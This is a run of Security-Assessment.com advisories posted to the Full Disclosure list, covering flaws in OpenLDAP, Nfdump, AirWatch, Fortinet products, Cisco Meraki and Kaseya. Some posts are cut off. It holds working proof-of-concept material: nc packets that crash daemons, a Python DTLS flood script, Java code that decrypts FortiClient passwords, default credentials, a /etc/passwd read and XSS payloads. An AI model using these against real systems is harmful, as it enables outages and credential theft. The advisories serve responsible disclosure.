[FD] OpenLDAP ber_get_next Denial of Service
(, ) (,
. '.' ) ('.',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _/ / _ \ _
\ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ |\\ \__( <_> ) Y Y \
/__ /\___|__ / \___ >/|__|_| /
\/ \/.-.\/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
OpenLDAP get_ber_next Denial of Service
Affected Versions: OpenLDAP <= 2.4.42
PDF:
http://www.security-assessment.com/files/documents/advisory/OpenLDAP-ber_get_next-Denial-of-Service.pdf
+-+
| Description |
+-+
This document details a vulnerability found within the OpenLDAP server daemon.
A Denial of Service vulnerability
was discovered within the slapd daemon, allowing an unauthenticated attacker to
crash the OpenLDAP server.
By sending a crafted packet, an attacker may cause the OpenLDAP server to reach
an assert() statement, crashing
the daemon. This was tested on OpenLDAP 2.4.42 (built with GCC 4.9.2) and
OpenLDAP 2.4.40 installed from the Debian
package repository.
+--+
| Exploitation |
+--+
By sending a crafted packet, an attacker can cause the OpenLDAP daemon to crash
with a SIGABRT. This is due to an
assert() call within the ber_get_next method (io.c line 682) that is hit when
decoding tampered BER data.
The following proof of concept exploit can be used to trigger the condition:
--[ Exploit POC
echo "/4SEhISEd4MKYj5ZMgAAAC8=" | base64 -d | nc -v 127.0.0.1 389
The above causes slapd to abort as follows when running with '-d3', however it
should be noted that this will crash
the server even when running in daemon mode.
--[ sladp -d3
55f0b36e slap_listener_activate(7):
55f0b36e >>> slap_listener(ldap:///)
55f0b36e connection_get(15): got connid=1000
55f0b36e connection_read(15): checking for input on id=1000
ber_get_next
ldap_read: want=8, got=8
: ff 84 84 84 84 84 77 83..w.
55f0b36e connection_get(15): got connid=1000
55f0b36e connection_read(15): checking for input on id=1000
ber_get_next
ldap_read: want=1, got=1
: 0a .
55f0b36e connection_get(15): got connid=1000
55f0b36e connection_read(15): checking for input on id=1000
ber_get_next
slapd: io.c:682: ber_get_next: Assertion `0' failed.
The following GDB back trace provides further information as to the location of
the issue.
--[ back trace
program received signal SIGABRT, Aborted.
[Switching to Thread 0x72e4a700 (LWP 1371)]
0x76a13107 in __GI_raise (sig=sig@entry=6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:56
56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0 0x76a13107 in __GI_raise (sig=sig@entry=6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1 0x76a144e8 in __GI_abort () at abort.c:89
#2 0x76a0c226 in __assert_fail_base (fmt=0x76b42ce8 "%s%s%s:%u:
%s%sAssertion `%s' failed.\n%n", assertion=assertion@entry=0x55f280 "0",
file=file@entry=0x59bdb1 "io.c",
line=line@entry=682, function=function@entry=0x59bf33
<__PRETTY_FUNCTION__.6337> "ber_get_next") at assert.c:92
#3 0x76a0c2d2 in __GI___assert_fail
(assertion=assertion@entry=0x55f280 "0", file=file@entry=0x59bdb1 "io.c",
line=line@entry=682,
function=function@entry=0x59bf33 <__PRETTY_FUNCTION__.6337> "ber_get_next")
at assert.c:101
#4 0x0053261a in ber_get_next (sb=0x7fffe40008c0, len=0x72e49b40,
ber=0x7fffe4000a00) at io.c:682
#5 0x00420b56 in connection_input (cri=,
conn=) at connection.c:1572
#6 connection_read (cri=, s=) at
connection.c:1460
#7 connection_read_thread (ctx=0x72e49b90, argv=0xf) at connection.c:1284
#8 0x0050c871 in ldap_int_thread_pool_wrapper (xpool=0x8956c0) at
tpool.c:696
#9 0x76d8f0a4 in start_thread (arg=0x72e4a700) at
pthread_create.c:309
#10 0x76ac404d in clone () at
../sysdeps/unix/sysv/linux/x86_64/clone.S:111
+--+
| Solution |
+--+
This issue has been resolved by commit 6fe51a9ab04fd28bbc171da3cf12f1c1040d6629
in
git://git.openldap.org/openldap.git
+--+
| Timeline |
+--+
10/09/15 - Issue raised on OpenLDAP issue tracker, marked as a ‘minor’ security
issue, as per the requirements in
the ITS, making the issue public.
10/09/15 - Patch pushed to OpenLDAP master branch by Howard Chu, commit
6fe51a9ab04fd28bbc171da3cf12f1c1040d6629
10/09/15 - Release of this advisory document.
+---+
| About Security-Assessment.com |
+---+
Security-Assessment.com is Australasia's leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients include
some of the largest globally recognised companies in areas such as finance,
[FD] KeeFarce - A KeePass 2.x database extraction tool
(, ) (,
. '.' ) ('.',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _/ / _ \ _
\ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ |\\ \__( <_> ) Y Y \
/__ /\___|__ / \___ >/|__|_| /
\/ \/.-.\/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
KeeFarce - An in-memory looter for KeePass 2.x databases
URL: https://github.com/denandz/KeeFarce
+-+
| Description |
+-+
KeeFarce leverages DLL injection to export the information (including usernames
and passwords) of a running and unlocked KeePass Database into a cleartext CSV
file. Source code and prebuilt executables are available on github at
https://github.com/denandz/KeeFarce
+---+
| About Security-Assessment.com |
+---+
Security-Assessment.com is Australasia's leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients include
some of the largest globally recognised companies in areas such as finance,
telecommunications, broadcasting, legal and government. Our aim is to provide
the very best independent advice and a high level of technical expertise while
creating long and lasting professional relationships with our clients.
Security-Assessment.com is committed to security research and development,
and its team continues to identify and responsibly publish vulnerabilities
in public and private software vendor's products. Members of the
Security-Assessment.com R&D team are globally recognised through their release
of whitepapers and presentations related to new security research.
For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info () security-assessment com
Phone +64 4 470 1650
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Nfdump Nfcapd 1.6.14 Multiple Vulnerabilities
(, ) (,
. '.' ) ('.',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _/ / _ \ _
\ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ |\\ \__( <_> ) Y Y \
/__ /\___|__ / \___ >/|__|_| /
\/ \/.-.\/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Nfdump Nfcapd Multiple Vulnerabilities
Affected Versions: Nfdump <= 1.6.14
PDF:
http://www.security-assessment.com/files/documents/advisory/Nfdump%20nfcapd%201.6.14%20-%20Multiple%20Vulnerabilities.pdf
+-+
| Description |
+-+
This document details multiple vulnerabilities found within the nfcapd netflow
collector daemon. An unauthenticated
attacker may leverage these vulnerabilities to trigger a denial of service
condition within the nfcapd daemon. Two
read based heap overflow vulnerabilities were found within the IPFIX processing
code and one logic based denial of
service was found in the Netflow V9 processing code.
+--+
| Exploitation |
+--+
== Process_ipfix_template_add heap overflow ==
By tampering the flowset_length parameter within an IPFIX packet, an attacker
can trigger a denial of service condition
within nfcapd. Line 931 in file ipfix.c decrements the size_left value by 4,
and by triggering a condition where the
initial value is less than 4, eg. 1 as in the below POC, an integer underflow
occurs. This wraps the size_left value
(indicating the remaining packet payload to be processed) to 4294967293,
resulting in nfcapd continuously processing the
heap-based buffer allocated for the input packet (allocated at line 381 of
nfcapd.c) until it eventually hits invalid
memory and crashes with a segmentation fault.
--[ Process_ipfix_template_add heap overflow POC
echo "AAoABQACAAUBAA==" | base64 -d | nc -u 127.0.0.1
== Process_ipfix_option_templates heap overflow ==
By submitting an IPFIX packet with a flowset id of 3 and a large
scope_field_count parameter (65535 in the below POC),
nfcapd will continuously process the heap-based buffer allocated for the
packet, eventually hitting an invalid memory
address and crashing with a segmentation fault. The scope_field_count is taken
directly from the packet (line 1108,
ipfix.c) and is subsequently used in the for loop processing the packet
contents (line 1138, ipfix.c)
--[ Process_ipfix_option_templates heap overflow POC
echo "AAoAAQADAAoA/wAA//8=" | base64 -d | nc -u
127.0.0.1
== Process_v9_data infinite loop ==
By sending a crafted packet, an attacker can cause the nfcapd daemon to enter
an infinite loop. As well as consuming a
considerable amount of processing power, this infinite loop will eventually
exhaust all available disk space. Once disk
space is exhausted, the nfcapd daemon will exit.
The infinite loop is triggered due to the table->input_record_size variable
being set to zero. As the Process_v9_data
method processes the packet, table->input_record_size is subtracted from the
size_left variable, with the intention being
that once size_left is zero the processing is concluded. As size_left is being
decremented by zero each loop, this while
loop (line 1529, netflow_v9.c) runs infinitely.
--[ Process_v9_data infinite loop POC
echo "AAkUBAQAAAYA/w==" |
base64 -d | nc -u 127.0.0.1
Further information is available in the PDF version of this advisory.
+--+
| Solution |
+--+
Upgrade to the latest Nfdump codebase (commit
6ef51a7405797289278b36a9a7deabb3cb64d80c or later)
+--+
| Timeline |
+--+
12/03/2016 - Advisory sent to Peter Haag
19/03/2016 - Advisory acknowledged
07/05/2016 - Additional information requested
07/05/2016 - Updated version released on GitHub
10/05/2016 - Advisory release
+---+
| About Security-Assessment.com |
+---+
Security-Assessment.com is a leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients include
some of the largest globally recognised companies in areas such as finance,
telecommunications, broadcasting, legal and government. Our aim is to provide
the very best independent advice and a high level of technical expertise while
creating long and lasting professional relationships with our clients.
Security-Assessment.com is committed to security research and development,
and its team continues to identify and responsibly publish vulnerabilities
in public and private software vendor's products. Members of the
Security-Assessment.com R&D team are globally recognised through their release
of whitepapers and presentations related to new security research.
For further information on this issue or any of our service offerings,
contact us:
Web
[FD] AirWatch Multiple Direct Object References
(, ) (,
. '.' ) ('.',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _/ / _ \ _
\ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ |\\ \__( <_> ) Y Y \
/__ /\___|__ / \___ >/|__|_| /
\/ \/.-.\/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
AirWatch Multiple Direct Object References
Affected Versions: AirWatch by VMware Cloud Console 7.3.1.0
AirWatch by VMware on-premise 7.3.x.x prior to 7.3.3.0 (FP3)
CVE Number: CVE-2014-8372
PDF:
http://www.security-assessment.com/files/documents/advisory/Airwatch_Multiple_Direct_Object_Reference_Vulnerabilities.pdf
+-+
| Description |
+-+
Multiple direct object reference vulnerabilities were found within the
AirWatch cloud console. VMWare advised that these issues also affect
on-premise AirWatch deployments. A malicious AirWatch user may leverage
several direct object references to gain access to information regarding other
AirWatch customers using the AirWatch cloud. This includes viewing groups and
downloading private APKs belonging to other organisations.
+--+
| Exploitation |
+--+
Detailed exploitation information is available in the PDF version of this
advisory, available at http://www.security-assessment.com
+--+
| Solution |
+--+
The AirWatch cloud based solution has been patched by VMware. The on-premises
deployment was also susceptible to the above attacks. On-premises users should
update to the latest version of AirWatch. VMware have published a detailed
advisory, including patch and mitigation information, at the following URL:
http://www.vmware.com/security/advisories/VMSA-2014-0014.html
+-+
| Disclosure Timeline |
+-+
29/10/2014 - Initial email to AirWatch support staff.
03/11/2014 - Advisory released to AirWatch
05/11/2014 - Advisory acknowledged by VMWare Security Response Center,
advised cloud solution will be patched within 48 hours.
10/12/2014 - VMWare releases patch and advisory.
29/01/2015 - Release of this document.
+---+
| About Security-Assessment.com |
+---+
Security-Assessment.com is Australasia's leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients include
some of the largest globally recognised companies in areas such as finance,
telecommunications, broadcasting, legal and government. Our aim is to provide
the very best independent advice and a high level of technical expertise while
creating long and lasting professional relationships with our clients.
Security-Assessment.com is committed to security research and development,
and its team continues to identify and responsibly publish vulnerabilities
in public and private software vendor's products. Members of the
Security-Assessment.com R&D team are globally recognised through their release
of whitepapers and presentations related to new security research.
For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info () security-assessment com
Phone +64 4 470 1650
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Fortinet FortiAuthenticator Multiple Vulnerabilities
(, ) (,
. '.' ) ('.',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _/ / _ \ _
\ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ |\\ \__( <_> ) Y Y \
/__ /\___|__ / \___ >/|__|_| /
\/ \/.-.\/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Fortinet FortiAuthenticator Multiple Vulnerabilities
Affected Versions: Verified on FortiAuthenticator v300 build 0007
PDF:
http://www.security-assessment.com/files/documents/advisory/Fortinet_FortiAuthenticator_Multiple_Vulnerabilities.pdf
+-+
| Description |
+-+
This advisory details multiple vulnerabilities found within the Fortinet
FortiAuthenticator virtual appliance. The FortiAuthenticator is a user
identity management appliance, supporting two factor authentication, RADIUS,
LDAP, 802.1x Wireless Authentication, Certificate management and single sign
on.
The FortiAuthenticator appliance was found to contain a subshell bypass
vulnerability, allowing remote administrators to gain root level access via
the command line. Local file and password disclosure vulnerabilities were
discovered, as well as a Reflected Cross Site Scripting vulnerability within
the SCEP system.
+--+
| Exploitation |
+--+
--[ dbgcore_enable_shell_access Subshell Bypass
By logging into the Fortinet Authenticator and executing the ‘shell’ command,
a malicious user can gain a root /bin/bash shell on the server. However,
unless the /tmp/privexec/dbgcore_enable_shell_access file exists (the contents
of this file are irrelevant), then the command returns ‘shell: No such
command.' If the file is present, then the command succeeds and a root shell
is given.
The ‘/tmp/privexec/dbgcore_enable_shell_access’ file can be created by using
the ‘load-debug-kit’ command and specifying a network accessible tftp server
with the relevant debug kit. The debug kits were found to be generated by an
internal Fortinet tool called ‘mkprivexec’. The ‘load-debug-kit’ command
expects encrypted binaries which are subsequently executed.
An attacker that can either generate a valid debug kit or create the
appropriate file in /tmp/privexec can therefore get a root shell. This is
likely a workaround for CVE-2013-6990, however an attacker can still obtain
root level command line access with some additional steps.
--[ Local File Disclosure
A malicious user can pass the ‘-f’ flag to the ‘dig’ command and read files
from the filesystem. An example would be executing 'dig -f /etc/passwd' and
observing the dig commands output, retrieving the /etc/passwd files contents.
--[ Password Disclosure
A malicious user may use the debug logging functionality within the Fortinet
FortiAuthenticator administrative console to obtain the passwords of the
PostgreSQL database users. The disclosed passwords were found to be weak and
are static across Fortinet FortiAuthenticator appliances. The following
credentials were enumerated:
+-+
|Username:Password|
+-+
| slony : slony |
|www-data:www-data|
+-+
--[ Reflected Cross Site Scripting
By coercing a legitimate user (usually through a social engineering attack) to
visit a specific FortiAuthenticator URL, an attacker may execute malicious
JavaScript in the context of the user’s browser. This can subsequently be used
to harm the user’s browser or hijack their session. This is due to the
‘operation’ parameter in the SCEP service being reflected to the end user
without sufficient input validation and output scrubbing. The following
URL can be used to replicate the Reflected Cross Site Scripting vulnerability:
https:///cert/scep/?operation=alert(1)
+--+
| Solution |
+--+
No official solution is currently available for these vulnerabilities. Email
correspondence with Fortinet suggests that the Local File Disclosure and
Password Disclosure vulnerabilities have been resolved in version 3.2. No
official documentation was found to confirm this.
+-+
| Disclosure Timeline |
+-+
08/10/2014 -Initial email sent to Fortinet PSIRT team.
09/10/2014 -Advisory documents sent to Fortinet.
15/10/2014 -Acknowledgement of advisories from Fortinet.
16/10/2014 -Fortinet advised the Local File and Password disclosure issues
would be resolved in the 3.2 release.
31/10/2014 -Additional information sent to Fortinet RE Reflected XSS
03/11/2014 -Additional information sent to Fortinet RE Reflected XSS
02/12/2014 -Update requested from Fortinet.
13/12/2014 -Update requested from Fortinet.
29/01/2015 -Advisory Release.
+---+
| About Security-Assessment.com |
+---+
Security-Assessment.com is Australasia's leading team of Information Security
consultants specialising in providing high quality Information Security
[FD] Fortinet FortiClient Multiple Vulnerabilities
(, ) (,
. '.' ) ('.',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _/ / _ \ _
\ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ |\\ \__( <_> ) Y Y \
/__ /\___|__ / \___ >/|__|_| /
\/ \/.-.\/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Fortinet FortiClient Multiple Vulnerabilities
Affected Versions: Verified on FortiClient iOS v5.2.028 and FortiClient Android
5.2.3.091
PDF:
http://www.security-assessment.com/files/documents/advisory/Fortinet_FortiClient_Multiple_Vulnerabilities.pdf
+-+
| Description |
+-+
This advisory details multiple vulnerabilities found within the Fortinet
FortiClient mobile applications. Forticlient is an endpoint security suite,
intended to provide an all-in-one security solution.
Both the Android and iOS applications did not check the validity of SSL
certificates, allowing an attacker performing a Man-In-The-Middle
attack to gain access to sensitive information such as SSL VPN credentials and
mobile device details.
Hard coded encryption keys were discovered within the Android application.
These encryption keys were found to be used to encrypt sensitive data stored
within the application’s Shared Preferences. As this key does not change per
instance, the decrypt code from an instance of a Forticlient application can
be used to retrieve the passwords from any other Android Forticlient
globally.
+--+
| Exploitation |
+--+
--[ Hardcoded Encryption Keys
After decompiling the FortiClient Android application, the ‘qm’ class was
found to contain a hard coded private string ‘KEY’. The character array was
found to contain "FoRtInEt!AnDrOiD". This key is used to encrypt and decrypt
saved passwords, stored within the application's shared preferences. The
following Java code can be used to decrypt Android Forticlient shared
preference parameter encrypted in this manner.
import java.util.Locale;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
public final class aa
{
private static final String KEY = new String(new char[] { 70, 111, 82, 116,
73, 110, 69, 116, 33, 65, 110, 68, 114, 79, 105, 68 });
public static void main(String[] args){
String crypted = "F3792242D92707AD537AACF429D8E28A";
System.out.println("Encrypted String:" + crypted);
System.out.println("Decrypted String:" + decrypt(crypted));
}
public static String decrypt(String paramString)
{
try
{
byte[] arrayOfByte = new byte[paramString.length() / 2];
for (int i = 0; paramString.length() / 2 > i; i++)
{
int j = Integer.parseInt(paramString.substring(i * 2, 1 + i * 2), 16);
arrayOfByte[i] = ((byte)(Integer.parseInt(paramString.substring(1 + i
* 2, 2 + i * 2), 16) + j * 16));
}
IvParameterSpec localIvParameterSpec = new IvParameterSpec(new byte[] {
117, 122, 39, 67, 114, 124, 115, 44, 113, 116, 124, 123, 58, 89, 118, 94 });
SecretKeySpec localSecretKeySpec = new SecretKeySpec(KEY.getBytes(),
"AES");
Cipher localCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
localCipher.init(2, localSecretKeySpec, localIvParameterSpec);
String str = new String(localCipher.doFinal(arrayOfByte));
return str;
}
catch (Exception localException)
{
}
return null;
}
}
--[ Broken SSL Certificate Validation
By performing a Man-In-The-Middle attack, an attacker can host their own SSL
server with a self-signed certificate and harvest credentials from legitimate
end users. As the FortiClient SSL VPN client and Endpoint Control client do
not validate certificates, the attacker can harvest credentials and
mobile device information.
The Android version of the FortiClient software was found to display a warning
prompt when the SSL VPN server’s certificate is not trusted. The iOS version
does not display any warnings to the user, regardless of whether or not the
‘check server certificate’ option is enabled (one should note that by default
this option is disabled). This exposes FortiClient iOS users to
Man-In-The-Middle attacks.
The Endpoint Control protocol, which attempts to connect to the devices default
gateway on TCP port 8010, similarly does not validate SSL certificates. Both
the FortiClient Android and iOS applications were found to ignore certificate
validity for the endpoint control protocol and did not prompt the end user
when the server’s certificate was invalid.
+--+
| Solution |
+--+
No official solution is currently available for these vulnerabilities.
+-+
| Disclosure Timeline |
+-+
08/10/2014 -Initial email sent to Fortinet PSIRT team.
09/10/2014 -Advisory documents sent to Fortinet.
15/10/2
[FD] Cisco Meraki Systems Manager Multiple Vulnerabilities
(, ) (,
. '.' ) ('.',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _/ / _ \ _
\ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ |\\ \__( <_> ) Y Y \
/__ /\___|__ / \___ >/|__|_| /
\/ \/.-.\/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Cisco Meraki Systems Manager Multiple Vulnerabilities
Affected Versions: Cisco Meraki Systems Manager - Unknown Versions
PDF:
http://www.security-assessment.com/files/documents/advisory/Cisco_Meraki_Systems_Manager_Multiple_Vulnerabilities.pdf
+-+
| Description |
+-+
The Cisco Meraki Systems Manager system was found to suffer from a number of
vulnerabilities. A Cross Site Request Forgery vulnerability was discovered,
allowing an attacker to determine the registration code for an organisation's
Systems Manager instance or send out spam email. A Stored Cross Site Scripting
vulnerability was discovered, allowing a malicious end user running the
Systems Manager MDM software to stage Cross Site Scripting attacks against the
organisation's administrative users.
The Cisco Meraki Systems Manager administrative console was found to suffer
from a Mass Assignment vulnerability, allowing a malicious user to leverage
the "Backpack" functionality to automatically download and install arbitrary
applications to the end user devices. Additionally, legitimate updates for the
Systems Manager MDM software were found to be shipped over HTTP. This allows
an attacker to intercept and tamper the application package provided they have
access to the network communications somewhere between the client and the
Meraki cloud.
+--+
| Exploitation |
+--+
--[ Cross Site Request Forgery
The Cisco Meraki System Manager administrative console uses an ‘X-CSRF-Token’
HTTP header to protect against Cross Site Request Forgery attacks, however it
was found that this header is often not validated on the server side and can
simply be omitted. The following POC can be used to coerce an authenticated
user into sending an email containing arbitrary content to an arbitrary
address.
https://n85.meraki.com/Systems-Manager/n/Q6mExcvb/manage/configure/pcc_send_mdm_link/";>
The CSRF POC on the previous page will send an invitation message to
‘ao367gnae9aer7...@mailinator.com’. An attacker may leverage this to enumerate
an organizations registration code and stage further attacks against the
Meraki deployment.
--[ Stored Cross Site Scripting
As Systems Manager relies on a certificate on the mobile device
(provisioned via SCEP during registration) to provide authentication. A
condition was discovered wherein a malicious user can retrieve the relevant
certificate and key and stage attacks against the Systems Manager
administrative console. This lead to a Stored Cross Site Scripting
vulnerability, where a malicious user may send a crafted request to
/android/callback with malicious JavaScript code in the system_model
parameter. The Mdm-Signature header is then recreated by the malicious user
and the payload sent. The Mdm-Signature header can be generated by using a
SpongyCastle content signer to generate a signature for the POST parameter
data.
The following is a request detailing the exploit. The system_model parameter
is the affected field. The parameter field has been shortened for brevities
sake.
POST /android/callback HTTP/1.1
Mdm-Signature:
Content-Length:
Content-Type: application/x-www-form-urlencoded
Host:
Connection: Keep-Alive
{snip}&system_model=Galaxy+XSS+%3cscript%3ealert(%27Malicious+Javascript%27)%3c%2fscript%3e{snip}
The certificate and key used to create the Mdm-Signature header can be found
under /data/data/com.meraki.sm/files/ on a provisioned Android
device. The password for the keystore is under the ‘scep_keystore_password’
shared preference.
In order to exploit this, the attacker must be registered against the
Meraki MDM instance (in order to have the correct certificate). This requires
the knowledge of a 10 digit enrollment code (xxx-xxx-). These need to be
brute forced or obtained via other means (invitation email, QR code,
etcetera).
--[ Backpack Mass Assignment
The ‘Backpack’ functionality of the Cisco Meraki Systems Manager can be abused
to install arbitrary APK files on users’ devices. This is achieved by using
mass assignment to define the ‘auto_download’ and ‘auto_install’ flags on a
specific item (in this case an APK file). This is done in the post to
/System-Manager/n//manage/configure/update_pcc_ios. Further information is
available in the PDF version of this advisory.
It should be noted that the management policy popup on the device disables the
back button once the user is prompted to install the arbitrary APK and access
back into the Meraki Systems manager application cannot be achieved without
tapping th
[FD] Fortinet FortiOS Multiple Vulnerabilities
(, ) (,
. '.' ) ('.',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _/ / _ \ _
\ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ |\\ \__( <_> ) Y Y \
/__ /\___|__ / \___ >/|__|_| /
\/ \/.-.\/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Fortinet FortiOS Multiple Vulnerabilities
Affected Versions: Verified on FortiOS Firmware v5.0,build4457 (GA Patch 7)
PDF:
http://www.security-assessment.com/files/documents/advisory/Fortinet_FortiOS_Multiple_Vulnerabilities.pdf
+-+
| Description |
+-+
This advisory details multiple vulnerabilities found within the Fortinet
FortiOS software. FortiOS is a security-hardened, purpose-built Operating
System that is the foundation of all FortiGate network security platforms.
A denial of service vulnerability was discovered within the CAPWAP Daemon,
allowing an attacker to lock the CAPWAP Access Controller. This was achieved
by sending recurring DTLS messages to the daemon. The CAPWAP daemon itself was
found to suffer from a Man-In-The-Middle vulnerability, due to the nature of
Fortinet’s certificate practices. A Stored Cross Site Scripting vulnerability
was also discovered, allowing an attacker to send a crafted CAPWAP join
request containing malicious JavaScript code. This code is subsequently
rendered in the FortiOS administrative console.
+--+
| Exploitation |
+--+
--[ CAPWAP Daemon DTLS Denial of Service Vulnerability
During the DTLS session establishment, the protocol implements a
‘HelloVerifyRequest’ send back to the client in response to the initial
‘ClientHello’. The client is then required to send a ‘ClientHello’ with a
specific cookie provided in the ‘HelloVerifyRequest’. This is designed to
protect against Denial of Service attacks. It was discovered that, even though
the Fortinet DTLS server implements this, sending a number of initial
‘ClientHello’ requests in short succession creates a denial of service
condition on the FortiOS device.
The number of requests required to trigger the condition was found to be
dependent on the specifications of the machine running FortiOS, however this
was tested against a mid-range Fortigate device and successfully caused a
Denial of Service condition with as little as ten requests.
The following POC code can be used to replicate this vulnerability:
#!/usr/bin/python
#
# FortiOS CAPWAP Control Denial Of Service POC
#
# This exploit will trigger a denial of service
# condition on the FortiOS CAPWAP Control Daemon
# by sending recurring DTLS Client Hello
# messages.
#
# Author: Denis Andzakovic
# Date: 19/08/2014
#
import socket
import os
import time
from struct import pack
import binascii
import argparse
# Grab parameters from command line
parser = argparse.ArgumentParser(description='FortiOS CAPWAP Control Server -
DTLS Client Hello DOS')
parser.add_argument('-d','--host', help="IP Address of the host to attack",
required=True)
args = parser.parse_args()
randombytes = os.urandom(28)
capwapreamble = "\x01\x00\x00\x00"
hello = "\x16" + "\xfe\xff" + "\x00"*8 #handshake id, version, epoch and seq
handshakeProtocol = "\x01" + "\x00\x00\x2c" + "\x00"*6 + "\x00\x2c" +
"\xfe\xff" + pack(">i",int(time.time())) + randombytes + "\x00" + "\x00" +
"\x00\x04" + "\x00\x2f\x00\x0a\x01\x00"
while True:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(capwapreamble + hello + pack(">H",len(handshakeProtocol)) +
handshakeProtocol, (args.host, 5246))
resp, senderaddr = sock.recvfrom(4098)
cookie = resp[31:]
print "[+] Got response. Cookie: " + binascii.hexlify(cookie)
--[ DTLS Man-In-The-Middle Vulnerability
Fortinet devices were found to use DTLS for the CAPWAP control protocol, with
the CAPWAP data protocol being cleartext by default. The CAPWAP DTLS protocol
was found to use a universal ‘Fortinet_Factory’ certificate and private key,
the certificate authority for which is static across all Fortinet devices. A
method for replacing this certificate was not found.
By harvesting this certificate and key, an attacker may stage Man in the
Middle attacks against any Fortinet device using the CAPWAP DTLS protocol.
This allows for the retrieval of sensitive information such as wireless SSIDs
and WPA passphrases. The two files, ‘Fortinet_Factory.cer’ and
‘Fortinet_Factory.key’ can be found in the /etc/cert/local directory on
Fortinet devices.
The following details the ‘Fortinet_Factory’ certificate and private
key. By using the following certificate an attacker may stage
Man in the M
[FD] Kaseya BYOD Gateway Multiple Vulnerabilities
(, ) (,
. '.' ) ('.',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _/ / _ \ _
\ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ |\\ \__( <_> ) Y Y \
/__ /\___|__ / \___ >/|__|_| /
\/ \/.-.\/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Kaseya BYOD Gateway Multiple Vulnerabilities
Affected Versions: Kaseya BYOD Gateway 7.0.2
PDF:
http://www.security-assessment.com/files/documents/advisory/Kaseya_BYOD_Gateway_Multiple_Vulnerabilities.pdf
+-+
| Description |
+-+
This advisory details multiple vulnerabilities found within the Kaseya BYOD
Gateway software. By chaining a combination of lacking SSL verification, poor
authentication mechanisms and arbitrary redirection vulnerabilities, a
malicious entity may potentially compromise any Kaseya BYOD installation.
The Kaseya BYOD Gateway software uses a redirection feature, wherein users are
redirected to their local Kaseya installation via Kaseya’s hosted servers. The
update request from the BYOD Gateway software to the Kaseya hosted servers was
not found to verify SSL certificates and fails to implement any form of
authentication, instead relying on the length of the gateway identifier to
provide security. Thus, the security of the solution depends on an attacker’s
ability to enumerate the gateway identifier. Once a malicious user enumerates
the Gateway identifier, then they may update the redirect rule for that
customer in Kaseya’s hosted servers, redirecting customers to a malicious
Kaseya BYOD Gateway.
+--+
| Exploitation |
+--+
--[ Lack of SSL Certificate Validation
The Kaseya BYOD Gateway was not found to validate SSL certificates when
contacting the Kaseya hosted servers. Requests were found to be made to the
Kaseya hosted servers when updating redirection information (for
local-network-only instances of Kaseya) and when submitting licensing
information. This allows a malicious entity with network access somewhere
between the BYOD Gateway and Kaseya’s servers to perform a Man-In-The-Middle
attack.
--[ Arbitrary Redirection
By intercepting and replaying the request below, a malicious entity may
specify an arbitrary ‘url’ parameter within the ‘siteinfo’ XML tag. The Kaseya
provisioning relay server then updates the BYOD Gateway redirect with the URL
specified. The redirection takes place when a user queries
https://provision.relay.kaseya.net/siteinfo/ (where code is the
installation’s 6 digit access code). The
https://provision.relay.kaseya.net/siteinfo/ page is queried during the
Kaseya BYOD mobile applications’ start up process in order to determine the
location of the BYOD Gateway.
POST /checkin/gateway/rq-be9781109e7111e3afa822000ab9104f HTTP/1.1
Accept-Encoding: identity
Content-Length: {content length}
Host: provision.relay.kaseya.net
Content-Type: text/xml
Connection: close
User-Agent: Kaseya-Tetra/7.0.2 (CL 7)
Once an installation’s Gateway Identifier is known
(rq-be9781109e7111e3afa822000ab9104f in the example above), a malicious entity
may control the redirection and send users to their own malicious Kaseya BYOD
Gateway. This code was found to be disclosed in a number of locations,
including device logs, in the Kaseya BYOD Gateway’s pages or by Kaseya’s
hosted relay servers. The installation gateway identifier is disclosed during
the sign up process. Thus, an attacker that can enumerate the customer's six
digit numeric registration code can step through the registration process,
retrieve the gateway identifier and hijack the installation.
+--+
| Solution |
+--+
No official solution is currently available for this issue.
+-+
| Disclosure Timeline |
+-+
03/10/2014 -Initial contact with Kaseya Support
09/10/2014 -Established Kaseya security contact
